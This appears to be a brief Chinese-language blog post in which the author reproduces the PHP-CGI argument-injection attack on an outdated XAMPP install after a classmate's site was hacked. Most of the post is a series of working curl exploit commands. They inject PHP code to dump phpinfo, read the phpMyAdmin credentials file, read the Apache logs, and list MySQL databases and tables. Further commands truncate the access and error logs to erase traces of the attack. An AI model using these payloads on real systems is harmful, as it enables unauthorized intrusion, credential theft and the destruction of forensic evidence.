同學說他的網站中槍, 研究一個晚上, 如果有被插 webshell or reverse shell 木馬之類的應該就沒救了 ~ 放生 ~~~~~
其中比較特別的是 -k 這個參數, 本來用 postman 丟半天都過不了, 後來想到他的憑證是不受信任
覺得 XAMPP 也太兩光, 這個漏洞 2024 就有了, 官網的綑綁包是沒有更新的… 會中槍不意外
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| # 取得 phpinfo
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data "<?php ob_clean(); phpinfo(); die(); ?>"
# 取得密碼
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data "<?php ob_clean(); echo '---KEY_START---'; readfile('C:/xampp/phpMyAdmin/config.inc.php'); die(); ?>"
# 看 log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data '<?php echo "--- Apache Access Log (Last 20 lines) ---\n"; system("powershell Get-Content C:\\xampp\\apache\\logs\\access.log -Tail 20"); exit; ?>'
# 清除 log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data '<?php $log="C:/xampp/apache/logs/access.log"; if(is_writable($log)){ file_put_contents($log, ""); echo "Access log has been truncated."; }else{ echo "Log file is not writable. It might be locked by Apache."; } exit; ?>'
# 清除 error log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data '<?php $log="C:/xampp/apache/logs/error.log"; if(is_writable($log)){ file_put_contents($log, ""); echo "Error log has been truncated."; }else{ echo "Log file not writable. It might be locked."; } exit; ?>'
# 列出 db
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data '<?php echo "--- MySQL Databases ---\n"; system("C:\\xampp\\mysql\\bin\\mysql.exe -u root -e \"SHOW DATABASES;\""); exit; ?>'
--- MySQL Databases ---
Database
information_schema
mysql
performance_schema
phpmyadmin
test
# 列出所有資料表
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
--header "Content-Type: application/x-www-form-urlencoded" `
--data '<?php echo "--- Tables in xxx_db ---\n"; system("C:\\xampp\\mysql\\bin\\mysql.exe -u root -e \"SHOW TABLES FROM xxx_db;\""); exit; ?>'
|